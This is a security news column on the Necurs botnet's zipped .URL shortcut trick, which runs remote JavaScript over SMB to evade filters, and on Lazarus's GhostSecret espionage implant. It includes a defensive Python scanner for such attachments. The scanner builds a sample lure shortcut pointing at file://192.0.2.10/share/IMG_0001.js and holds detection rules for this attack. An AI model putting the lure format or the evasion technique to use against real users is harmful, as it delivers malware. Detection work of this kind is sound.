Large Necurs Botnet Uses New Spam Detection Evasion Trick

Necurs, one of the largest and long-lived spam botnets that’s still in operation today, has received an update that could help it evade spam filters.

The new trick, observed by researchers from Trend Micro, consists of spam emails with .zip attachments that contain files with the .URL extension. Many email providers and spam filters automatically block file attachments with potentially dangerous extensions, even when they’re located inside .zip archives, but .URL is not one of those.

On Windows, .URL files are displayed as shortcuts and will open websites or web-based directories. Like all Windows shortcuts, they can have a custom icon, and Necurs takes advantage of this to make them appear as media folders. Furthermore, the file names begin with IMG, PIC or SCN to suggest they’re images.

Once a user clicks on such a file, the computer will open a connection to a remote server over the SMB (Server Message Block) protocol and will execute a JavaScript file located on the server.

This tactic might successfully evade spam filters because the archive no longer contains a suspicious executable or scripting file. Furthermore, when executed through SMB the JavaScript is no longer downloaded to the local computer, so there’s nothing to scan.
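The attachment pattern described above can be caught at the mail gateway without executing anything: unpack the .zip, look for entries with the .URL extension, parse their standard INI-style `[InternetShortcut]` section, and flag shortcuts whose target is a UNC or `file://` location (which Windows would fetch over SMB), whose target is a script file, that carry a custom icon, or whose name uses the image-like prefixes mentioned in the article. The following is an added example written for this page, not Trend Micro's or the botnet's code; the archive contents, the file names and the TEST-NET host `192.0.2.10` are constructed sample data.

```python
"""
Scan a .zip email attachment for Windows .URL shortcuts that point at a
remote SMB/file:// location. Added detection example; the sample archive
built below is constructed for illustration only.
"""
import configparser
import io
import zipfile
from urllib.parse import urlparse

# File-name prefixes the article reports Necurs using to suggest images.
LURE_PREFIXES = ("IMG", "PIC", "SCN")
SCRIPT_EXTENSIONS = (".js", ".jse", ".vbs", ".wsf", ".hta")


def parse_url_shortcut(data: bytes) -> dict:
    """Parse the [InternetShortcut] section of a .URL file.

    Returns the section's keys lower-cased, or an empty dict when the data
    is not a valid shortcut (configparser lower-cases keys by default).
    """
    text = data.decode("utf-8", errors="replace")
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        cp.read_string(text)
    except configparser.Error:
        return {}
    if "InternetShortcut" not in cp:
        return {}
    return {k.lower(): v for k, v in cp["InternetShortcut"].items()}


def target_is_remote_file(url: str) -> bool:
    """True if opening the target would make Windows reach out over SMB:
    a UNC path (\\\\host\\share) or a file:// URL that names a host."""
    u = url.strip()
    if u.startswith("\\\\") or u.startswith("//"):
        return True
    parsed = urlparse(u)
    return parsed.scheme.lower() == "file" and bool(parsed.netloc)


def scan_zip_attachment(zip_bytes: bytes) -> list:
    """Return a list of suspicious .URL entries with the reasons they matched."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".url"):
                continue
            fields = parse_url_shortcut(zf.read(info.filename))
            target = fields.get("url", "")
            base_name = info.filename.rsplit("/", 1)[-1]
            reasons = []
            if target_is_remote_file(target):
                reasons.append("remote SMB/file target")
            if target.lower().endswith(SCRIPT_EXTENSIONS):
                reasons.append("script file target")
            if "iconfile" in fields:
                reasons.append("custom icon (possible folder/image masquerade)")
            if base_name.upper().startswith(LURE_PREFIXES):
                reasons.append("image-like name prefix")
            if reasons:
                findings.append(
                    {"name": info.filename, "target": target, "reasons": reasons}
                )
    return findings


def build_sample_zip() -> bytes:
    """Constructed sample archive: one lure-style shortcut, one harmless
    web shortcut and a text file. The host 192.0.2.10 is a TEST-NET address."""
    lure = (
        "[InternetShortcut]\r\n"
        "URL=file://192.0.2.10/share/IMG_0001.js\r\n"
        "IconFile=C:\\Windows\\System32\\shell32.dll\r\n"
        "IconIndex=3\r\n"
    )
    benign = "[InternetShortcut]\r\nURL=https://example.com/\r\n"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("IMG_20180425.url", lure)
        zf.writestr("readme.url", benign)
        zf.writestr("notes.txt", "plain text")
    return buf.getvalue()


if __name__ == "__main__":
    for hit in scan_zip_attachment(build_sample_zip()):
        print(hit["name"], "->", hit["target"], ";", ", ".join(hit["reasons"]))
```

The remote-target check is the one that matters most: a shortcut that resolves to a UNC path or a `file://` URL with a host name is exactly what causes the outbound SMB connection the article describes, so a gateway can quarantine on that alone, while the name prefix and custom icon are supporting signals that can change from one campaign to the next.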

“Previously, Necurs’s JavaScript downloader downloads the final payload,” the Trend Micro researchers said in a blog post. “But in its latest iteration, the remote script downloads QUANTLOADER (detected by Trend Micro as TROJ_QUANT) – a different downloader – which then downloads the final payload. This is another layer added to Necurs’s infection chain.”

QUANTLOADER itself is persistent on infected systems, as it sets up registry keys to get executed every time the OS starts. This means that attackers can serve additional malware or updates through it.

Attackers are always searching for new techniques that can trick users and evade security products. Users should be wary of email attachments from unknown sources, even if at first glance they appear to contain benign files such as, in this case, shortcuts.

North Korean Hackers Expand New Cyberespionage Campaign

The North and South Korean leaders met during a historic summit that paves the way for a peace agreement between their two countries. Meanwhile, in cyberspace, North Korean hackers continue to hack into foreign organizations to gather valuable information and potentially financial resources for the regime.

Security researchers from McAfee reported last month that Turkish banks were targeted in a new wave of attacks by North Korea’s notorious Lazarus Group, also known as Hidden Cobra. This group has been responsible for the attack on Sony Pictures in 2014 and for the theft of millions of dollars from central banks.

McAfee has since determined that the attacks against Turkish banks were part of a much larger cyberespionage campaign that targets organizations from around the world and which is still in its early reconnaissance stages.

The campaign, now dubbed Operation GhostSecret, uses a new data gathering implant that was found between March 14 and March 18 on computers belonging to organizations from 17 countries. The impacted organizations are from industries such as telecommunications, health care, finance, critical infrastructure and entertainment, and a large number of them are based in Thailand.

The new implant reuses a lot of code from the Destover malware that Hidden Cobra used against Sony in 2014 and in other attacks since then. McAfee has also found a previously undocumented component called Proxysvc that establishes encrypted communication with command-and-control servers and delivers additional payloads to infected systems.

“The evolution in complexity of these data-gathering implants reveals an advanced capability by an attacker that continues its development of tools,” the McAfee researchers said in a blog post. “Our investigation uncovered an unknown infrastructure connected to recent operations with servers in India using an advanced implant to establish a covert network to gather data and launch further attacks.”

Lucian Constantin

Lucian has been covering computer security and the hacker culture for almost a decade, his work appearing in many technology publications including PCWorld, Computerworld, Network World, CIO, CSO, Forbes and The Inquirer. He has a bachelor's degree in political science, but has been passionate about computers and cybersecurity from an early age. Before he chose a career in journalism, Lucian worked as a system and network administrator. He enjoys attending security conferences and delving into interesting research papers. You can reach him at [email protected] or @lconstantin on Twitter. For encrypted email, his PGP key's fingerprint is: 7A66 4901 5CDA 844E 8C6D 04D5 2BB4 6332 FC52 6D42